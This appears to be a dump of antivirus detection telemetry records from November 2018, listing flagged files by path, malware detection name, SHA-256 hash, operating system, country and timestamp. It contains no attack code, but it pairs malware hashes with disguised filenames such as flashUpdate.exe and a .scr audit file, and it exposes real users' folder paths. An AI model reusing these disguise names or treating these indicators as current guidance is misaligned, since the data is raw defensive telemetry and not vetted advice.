  Row(detection=Row(filename='avscan-20181102-061827-14b84bf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061827-14B84BF9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055117-497b6716', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055117-497B6716', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052012-f1888652', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052012-F1888652', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053620-32a7bc81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32A7BC81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061150-283079db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061150-283079DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051330-01cbd050', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051330-01CBD050', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053016-59a2ae66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053016-59A2AE66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055538-e49aa0fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055538-E49AA0FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061801-05128bcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061801-05128BCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061131-1d1954c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061131-1D1954C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052616-cacc1348', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052616-CACC1348', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052616-ca53dbbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052616-CA53DBBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053900-92370498', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053900-92370498', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-01a1eeb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-01A1EEB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061658-dff9a742', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061658-DFF9A742', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060654-77cf950d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060654-77CF950D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052923-3a3fe4e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052923-3A3FE4E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050918-6ba59939', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050918-6BA59939', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050953-80b9c95e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050953-80B9C95E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062504-01b89da6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062504-01B89DA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052947-48630dbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052947-48630DBB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061749-fdf929cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061749-FDF929CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060920-cefa53d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060920-CEFA53D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053759-6d6503c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053759-6D6503C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050540-e9f7ac3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050540-E9F7AC3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061036-fbd06d68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061036-FBD06D68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='caption.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Presets\\WebContactSheet\\Horizontal Blue & Gray\\Caption.htm', filesize=216000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='7684a580e6eaf003a19147931f275c9dfc9dda688b69b04088fea44155572492', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T05:52:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053445-fa3cdfb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053445-FA3CDFB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061701-e18812b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061701-E18812B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062229-a553e4cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062229-A553E4CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055939-7432b3dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055939-7432B3DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051407-184969de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051407-184969DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060927-d2d5e3f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060927-D2D5E3F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055427-ba9a7b95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055427-BA9A7B95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050658-18818e66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050658-18818E66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053314-c3e76f21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053314-C3E76F21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051216-d5fa74dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051216-D5FA74DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062212-9abdbcfd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062212-9ABDBCFD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pktextract.exe', filepath='E:\\development kit\\Bin\\pktextract.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R6433'), hash='7d3731711f8b82f4e93e5b2f8fe6148c053fee19439da82cdde28671543c9f77', metadata=Row(cmdline='\\\\\\/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=248320, timestamp='2018-11-02T10:05:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055917-679a0185', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055917-679A0185', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055500-ce24f1c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055500-CE24F1C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054820-e0017a80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054820-E0017A80', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062249-b13ddb7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062249-B13DDB7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1736704, timestamp='2018-11-01T06:11:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='container.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PERSIAPAN AUDIT\\C-TPAT CONTAINER\\CONTAINER.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adjprog.exe', filepath='D:\\TOP MIL\\BALCAO MATRIZ\\TOP MIL 3\\2018\\PROGRAMAS T.I\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Cobian Backup 11\\cbService.exe', parentsize=1131008, timestamp='2018-11-01T22:13:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155040-8bf3d971', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155040-8BF3D971', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155037-8b630986', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155037-8B630986', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd worship.exe', filepath='D:\\CD Worship.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9495008\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\opengl_2860391392.exe', parentsize=2488056, timestamp='2018-11-01T17:33:29Z'), dt=datetime.date(2018, 11, 1)),
